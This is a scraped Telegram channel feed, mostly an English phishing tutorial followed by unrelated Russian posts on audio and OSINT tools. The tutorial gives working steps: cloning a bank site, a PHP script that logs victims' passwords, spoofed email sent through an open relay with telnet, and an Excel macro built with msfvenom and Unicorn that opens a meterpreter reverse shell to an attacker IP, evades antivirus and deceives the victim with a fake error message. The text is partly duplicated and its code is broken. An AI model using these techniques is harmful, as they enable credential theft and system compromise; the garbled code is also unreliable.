𝗣𝗛𝗜𝗦𝗛𝗜𝗡𝗚
Phishing is the attempt to acquire sensitive information by disguising itself as a known and trusted entity in the world of electronic communication.
Types Of Sensitive Information
▶️ Login Credentials (Email / User / Pass)
▶️ Credit Cards
▶️ Identity (Driving License Documents)
▶️ Health Information
▶️ Accounts like: Steam, Bitcoin Wallet etc.
3 Types Of Usual Attacks
🔵 Phishing - usually with a specific goal and to receive money
🔵 Spear phishing - specific goals or groups
🔵 Whaling - specific on a single person
Phishing Process
1️⃣ Reconnaissance (e.g. E-Mail, Position in the Company, Systems, Log-in Page etc.)
▶️ Information Gathering
▶️ Large companies potentially buy email on black market
▶️ Start testing to correct future attacks
▶️ Active and passive information gathering for vulnerabilities
Survey Tools:
▶️ Metagoofil (https://tools.kali.org/information-gathering/metagoofil)
▶️ Maltengo Radium (https://www.maltego.com/downloads/)
▶️ Net Glub (http://redmine.lab.diateam.net/attachments/download/1/netglub-1.0.tar.gz)
▶️ Recon-ng (https://github.com/lanmaster53/recon-ng)
▶️ TheHavarester (https://github.com/laramies/theHarvester)
2️⃣ Setup and deploy (organization of systems useful to our goal)
▶️ Domain Registration (https://www.godaddy.com)
▶️ Mass Mailer
▶️ Open Relays For The Domain Target
▶️ Web Server Setup
▶️ Website Cloning
▶️ Web Application Development
▶️ Malicious Attachments / Malware Payloads
▶️ Browser Exploits
Read Also : What is Open Relay (https://www.techopedia.com/definition/1699/open-relay)
Test verything before sending you will not have a second chance (send first to own mail, use protonmail, gmail with anti spam detection).
3️⃣ Collect responses / organize them
Test your credentials:
Make other phish attacks from trusted account, connect them to a botnet / shells and persist increase your privileges.
4️⃣ Draw up a report do it for exercise and to keep everything tidy
Let's get to work. We identify our goal and fully carry out point one
Clone the website for hosting:
URL = Your URL
This attack to be functional we need to register user and pass of the various users, we can write a short php script to collect all the variables (like user / pass)
We register username and password:
We save them in collect.txt
We refer them to the original site
Edit the localhost with your server name (Phishing Website)
Type on
So as we set up the script the copy of the website the script would not work, so we have to go to the cloanate site and change the form.
<form> original
working <form>
So once we have created the site and found a way to collect the data we have to set up a server and finally test our attacks.
So here we have the right set of permissions for our web page
Now testing the page we created we go to check:
for example:
Once tested that this works we go back to the reconnaissance phase
Mail server
We must understand how to send phishing e-mail.
During a vulnerability scan we will find that the mail server to an open relay that will allow us to impersonate a specific user.
So using telnet we will build the email for our goal.
In which we will impersonate a known and privileged user, who asks another known and privileged user to test the new performances of a specific private section
We are using SMTPs for this section ex:
webmail.gamewood.net:587,gin4fred@gamewood.net,srcosth
SMTP Server : webmail.gamewood.net
Port : 587
Mail : gin4fred@gamewood.net
Password : scrcosth
Attack tools - Make the job easier
▶️ SET ( https://github.com/trustedsec/social-engineer-toolkit )
▶️ Phishing Frenzy ( https://github.com/pentestgeek/phishing-frenzy )
▶️ beEF ( https://github.com/beefproject/beef )
SET the best, completed tool of social engineering attacks
beEF is normally used as part of the attack to learn more information
Phishing Frenzy is like SET and very nice
--------------------
Speedphish Framework - SPF
✦ Passes for all initial work points
✦ Automatic tasks useful to perform a phishing attack
✦ Written in python
✦ Complete or partial automation
✦ Can be configured with external tools if available
Features:
➣ Collects email addresses from internet
➣ Setup & host website
➣ Send phishing e-mail to our target
➣ Keylogger
➣ Create reports
Installation:
Important give a delay to:
The suggestion is to run --test first and check all the work and that it is perfect
Let's take a look at the config:
We can set up the server that sends email
If we try to run
Will tell us that it is using the settings in the
Is trying to find emails linked to the website
at the end of the process he will tell us that for example 41 emails have been found linked to our target.
Then tool will start phishing on the webserver looking for template we will edit the templates
you will find us e-mail template then it will start sending emails
Finally, it will monitor the phishing website activity we will see all the activities on our templates and pressing ctrlc will stop the webserver generating the report.
Of course if we have not collected anything it is not convenient to interrupt the webserver.
Phishing is the attempt to acquire sensitive information by disguising itself as a known and trusted entity in the world of electronic communication.
Types Of Sensitive Information
3 Types Of Usual Attacks
Phishing Process
Survey Tools:
Read Also : What is Open Relay (https://www.techopedia.com/definition/1699/open-relay)
Test verything before sending you will not have a second chance (send first to own mail, use protonmail, gmail with anti spam detection).
Test your credentials:
Make other phish attacks from trusted account, connect them to a botnet / shells and persist increase your privileges.
Let's get to work. We identify our goal and fully carry out point one
Clone the website for hosting:
wget -r https://URL
URL = Your URL
Start fixing the cloned site:sudo cp -r -v bankofamerica.com/index /var/www/html
sudo nano /var/www/html/index.html
This attack to be functional we need to register user and pass of the various users, we can write a short php script to collect all the variables (like user / pass)
<?php
$user = &_POST['_user'];
$pass = &_POST['_pass'];
$f = fopen("collect.txt", "a");
fwrite($ f, "$user: $pass \ n");
fclose();
header("Location: https://localhost/index.html");
die();
?>
We register username and password:
$ user = & _POST ['_ user'];
$ pass = & _POST ['_ pass'];
We save them in collect.txt
$ f = fopen ("collect.txt", "a");
fwrite ($ f, "$ user: $ pass \ n");
fclose ();We refer them to the original site
header ("Location: https://localhost/index.html");
die ();Edit the localhost with your server name (Phishing Website)
service apache2 start
Type on
firefox localhost/index.html and you can see your website. I will talk soon about setting up a phishing page with own login and making a amazon phishing site or so on.So as we set up the script the copy of the website the script would not work, so we have to go to the cloanate site and change the form.
<form> original
<form name="form" action="index.html" method="post">
working <form>
<form name="form" action="form.php" method="post">
So once we have created the site and found a way to collect the data we have to set up a server and finally test our attacks.
So here we have the right set of permissions for our web page
sudo chown www-data /var/www/ -R
service apache2 restart
Now testing the page we created we go to check:
cat /var/www/html/collect.txtfor example:
lol / user iMbid / passOnce tested that this works we go back to the reconnaissance phase
Mail server
We must understand how to send phishing e-mail.
During a vulnerability scan we will find that the mail server to an open relay that will allow us to impersonate a specific user.
So using telnet we will build the email for our goal.
In which we will impersonate a known and privileged user, who asks another known and privileged user to test the new performances of a specific private section
We are using SMTPs for this section ex:
webmail.gamewood.net:587,gin4fred@gamewood.net,srcosth
SMTP Server : webmail.gamewood.net
Port : 587
Mail : gin4fred@gamewood.net
Password : scrcosth
telnet webmail.gamewood.net 587
EHLO webmail.gamewood.net
MAIL FROM: no-reply@amazonl.com
RCPT TO: john-smith@gmail.com
DATA
SUBJECT: Webmail Site Update
We are currently testing a new performance configuration for the webmail site, please test the site change by visiting: https://rec.amazon.com/index.html (our crafted url)
Thanks
.
quit
Attack tools - Make the job easier
SET the best, completed tool of social engineering attacks
beEF is normally used as part of the attack to learn more information
Phishing Frenzy is like SET and very nice
--------------------
Speedphish Framework - SPF
✦ Passes for all initial work points
✦ Automatic tasks useful to perform a phishing attack
✦ Written in python
✦ Complete or partial automation
✦ Can be configured with external tools if available
Features:
➣ Collects email addresses from internet
➣ Setup & host website
➣ Send phishing e-mail to our target
➣ Keylogger
➣ Create reports
Installation:
sudo apt-get install git build-essential python-dev python-pip phantomjs -y
sudo apt install python3-twisted
sudo apt install python3-dnspython
git clone https://github.com/tatanus/SPF
cd SPF
/spf
$ ./spf.py -h
Important give a delay to:
--test
--all
The suggestion is to run --test first and check all the work and that it is perfect
Let's take a look at the config:
We can set up the server that sends email
If we try to run
./spf.py --test -d example.com
Will tell us that it is using the settings in the
default.cfg (we can also have multiple.cfg files)Is trying to find emails linked to the website
at the end of the process he will tell us that for example 41 emails have been found linked to our target.
Then tool will start phishing on the webserver looking for template we will edit the templates
you will find us e-mail template then it will start sending emails
Finally, it will monitor the phishing website activity we will see all the activities on our templates and pressing ctrlc will stop the webserver generating the report.
Of course if we have not collected anything it is not convenient to interrupt the webserver.
Please open Telegram to view this post
VIEW IN TELEGRAM
Kali Linux
Tool Documentation:
metagoofil Usage Example Scan for documents from a domain (-d kali.org) that are PDF files (-t pdf), searching 100 results (-l 100), download 25 files (-n 25), saving the downloads to a directory (-o kalipdf), and saving the output to a file (-f kalipdf.html):…
❤2
PHISHING ATTACKS WITH OFFICE MACROS
Executable files are usually blocked in e-mails, so that it is usually easier to smuggle EXE files in via USB. Instead of phishing e-mails, in recent years there has therefore been an increasing use of Office Markos, which hide themselves in files stored on USB sticks.
In general, Excel macros can be created with Metasploit and the tool
Windows Defender recognizes the Metasploit code even when it is embedded in an Excel file as a macro. At this point you can again use encoders and iterations to bypass the virus scanner. An alternative possibility is the Pythons-Script Unicorn from TrustedSec, which can be obtained and started directly from Github.
When calling, you specify the payload and other payload-specific options (for example, the IP address and port number to which the code is to connect back). Finally, the tool optionally expects you to specify which type of code it should create:
Click on the button "Macros" to get to the overview
You can then copy the code created by Unicorn directly into the editor. Copy the Unicorn code into the VBA Editor.
This completes the Excel macro and you can save the VBA code and close the editor. You can also save & close the Excel document. With a Phishing E-mail you can attach the file and send it to a recipient.
Since a Reverse Connect Shell was selected when creating the VBA code, you also have to open the port on your Kali linux. Unicorn has already written the necessary steps in the file
If the victim opens the Excel document, he is asked whether macros should be activated in Excel. If the target agrees, a connection with Kali Linux is established in the background. Immediately afterwards, the user is presented with a false error message, claiming that the file was created with an older version of Excel. This is to prevent the user from examining the file more closely.
Once macros have been activated, the code will connect back to Kali Linux where the incoming connections can be seen. With the
Executable files are usually blocked in e-mails, so that it is usually easier to smuggle EXE files in via USB. Instead of phishing e-mails, in recent years there has therefore been an increasing use of Office Markos, which hide themselves in files stored on USB sticks.
In general, Excel macros can be created with Metasploit and the tool
msfvenom, just like EXE files before. To do this, you specify the payload (-p), the respective payload options and, above all, the VBA format. Here Metasploit offers several variants. These include vba-psh, which is used to create and start VBA code for the PowerShell.ifconfig
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.4 LPORT=8080 -f vba-psh -o vba-psh-msfvenom.txt
Windows Defender recognizes the Metasploit code even when it is embedded in an Excel file as a macro. At this point you can again use encoders and iterations to bypass the virus scanner. An alternative possibility is the Pythons-Script Unicorn from TrustedSec, which can be obtained and started directly from Github.
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
./unicorn.py --help
When calling, you specify the payload and other payload-specific options (for example, the IP address and port number to which the code is to connect back). Finally, the tool optionally expects you to specify which type of code it should create:
hta, macro, dde or crt
To create a reverse shell that communicates over HTTPS and therefore cannot be detected by the firewall system, select the payload windows/meterpreter/reverse_https and insert the IP address of Kali Linux or the system you are using and any port. Finally, tell the tool with the macro parameter that you want to create an office file with macro.
./unicorn.py windows/meterpreter/reverse_https 192.168.0.4 443 macro
The unicorn tool describes how to insert this code into an Excel document immediately after creating the marker. To do this, open Excel and click on the "macros" item in the "View" ribbon. To create a new macro, you can enter any name in the upper text field of the new pop-up. Afterwards create the macro by clicking on "Create".Click on the button "Macros" to get to the overview
You can then copy the code created by Unicorn directly into the editor. Copy the Unicorn code into the VBA Editor.
This completes the Excel macro and you can save the VBA code and close the editor. You can also save & close the Excel document. With a Phishing E-mail you can attach the file and send it to a recipient.
Since a Reverse Connect Shell was selected when creating the VBA code, you also have to open the port on your Kali linux. Unicorn has already written the necessary steps in the file
unicorn.rc, so you only have to call Metasploit with the prepared scriptmsfconsole -r unicorn.rc
If the victim opens the Excel document, he is asked whether macros should be activated in Excel. If the target agrees, a connection with Kali Linux is established in the background. Immediately afterwards, the user is presented with a false error message, claiming that the file was created with an older version of Excel. This is to prevent the user from examining the file more closely.
Once macros have been activated, the code will connect back to Kali Linux where the incoming connections can be seen. With the
session command you can then list and interact with current connections again.
msf exploit(multi/handler) > sessions -l
msf exploit(multi/handler) > sessions -i 1
meterpreter> sysinfo
❤2
Scripts_MEga_pack.rar
63.2 MB
Over 100 Scripts about
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
🎶 Нашёл новую тулзу, которая делает автоматический мастеринг треков — TrackGleam прямо в браузере выдаёт чистый и насыщенный звук, как после обработки в студии.
Что делает:
• Исправляет частотный баланс, уменьшает резкость и многое другое.
• Отдельно контролирует низкие, средние и высокие частоты.
• Добавляет громкость и плотность звука.
• С помощью режимов AI Fix Gentle и Strong удаляет артефакты музыки от ИИ.
• Результат можно скачать в формате WAV.
• Без регистрации и водяных знаков.
• Вся обработка происходит локально, файлы не уходят на сервер.
Ваша личная студия звукозаписи в браузере — тут.
@notboring_tech
_______
Источник | #notboring_tech
@F_S_C_P
▪️Генерируй картинки и видео в Mini App:
Flux + Veo 3 + Wan 2.2 + MidJourney v7 + другие
Что делает:
• Исправляет частотный баланс, уменьшает резкость и многое другое.
• Отдельно контролирует низкие, средние и высокие частоты.
• Добавляет громкость и плотность звука.
• С помощью режимов AI Fix Gentle и Strong удаляет артефакты музыки от ИИ.
• Результат можно скачать в формате WAV.
• Без регистрации и водяных знаков.
• Вся обработка происходит локально, файлы не уходят на сервер.
Ваша личная студия звукозаписи в браузере — тут.
@notboring_tech
_______
Источник | #notboring_tech
@F_S_C_P
▪️Генерируй картинки и видео в Mini App:
Flux + Veo 3 + Wan 2.2 + MidJourney v7 + другие
❤1
Eyesharvester — это инструмент для разведки IP-камер, видеорегистраторов и сетевых видеорегистраторов. Вы задаёте диапазон IP-адресов, он сканирует распространённые порты, определяет производителя и, при необходимости, пытается использовать стандартные учётные данные. Он также может отображать известные уязвимости CVE, связанные с определённым брендом, и давать базовые рекомендации по усилению безопасности. Инструмент предназначен в основном для идентификации и составления отчётов.
https://github.com/Exhunterx/eyesharvester
📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
https://github.com/Exhunterx/eyesharvester
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
В последнее время мы видим много постов о God's Eye, симуляторе шпионского спутника, работающем в браузере. Это отличный инструмент, разработанный Билавалом Сидху, но для его работы требуются определенные платные API. Эти API значительно расширяют возможности программы, но их может быть сложно получить, или вы просто не хотите за них платить. Это нормально. Поэтому мы хотим рассказать о форке...
https://github.com/Gh0st-mods/Gods-Eye-Ghost-Edition
📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
https://github.com/Gh0st-mods/Gods-Eye-Ghost-Edition
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Продолжаю развивать легальную базу для российских OSINT-исследователей на t.me/project_OSINTbro:
OSINTbro — портативный браузер для интернет-расследований и разведки по открытым источникам (OSINT), созданный на базе Opera Portable. Проект представляет собой готовое рабочее окружение, которое функционирует без установки на компьютер прямо с USB-флешки. Браузер содержит 1000+ структурированных OSINT-ресурсов, инструментов и поисковых закладок. Запускается на любом ПК без конфигурации, сохраняя рабочие сессии и историю внутри внешнего накопителя.
OSINT_links — готовый файл тех же закладок на OSINT-ресурсы, которые можно импортировать в Яндекс.Браузер, Chrome, Firefox, Safari и другие популярные браузеры.
OSINTbro — портативный браузер для интернет-расследований и разведки по открытым источникам (OSINT), созданный на базе Opera Portable. Проект представляет собой готовое рабочее окружение, которое функционирует без установки на компьютер прямо с USB-флешки. Браузер содержит 1000+ структурированных OSINT-ресурсов, инструментов и поисковых закладок. Запускается на любом ПК без конфигурации, сохраняя рабочие сессии и историю внутри внешнего накопителя.
OSINT_links — готовый файл тех же закладок на OSINT-ресурсы, которые можно импортировать в Яндекс.Браузер, Chrome, Firefox, Safari и другие популярные браузеры.
❤1
@voice_platform_bot — позволяет идентифицировать платформу Telegram по отправленному голосовому сообщению.
В ручном режиме для этого используем команду:
И смотрим на поле Vendor:
iPhone — libopus 1.5.1
Android — libopus unknown-fixed
Telegram Desktop (macos) — Lavf60.16.101
macOS native — libopus 1.3.1-fixed
Telegram X — libopus unknown
Telegram Web K — tweb
Telegram Web A — telegram-web-a
Наводка от https://t.me/chekist42
📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
В ручном режиме для этого используем команду:
exiftool -a -G1 -u voice.oggИ смотрим на поле Vendor:
iPhone — libopus 1.5.1
Android — libopus unknown-fixed
Telegram Desktop (macos) — Lavf60.16.101
macOS native — libopus 1.3.1-fixed
Telegram X — libopus unknown
Telegram Web K — tweb
Telegram Web A — telegram-web-a
Наводка от https://t.me/chekist42
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1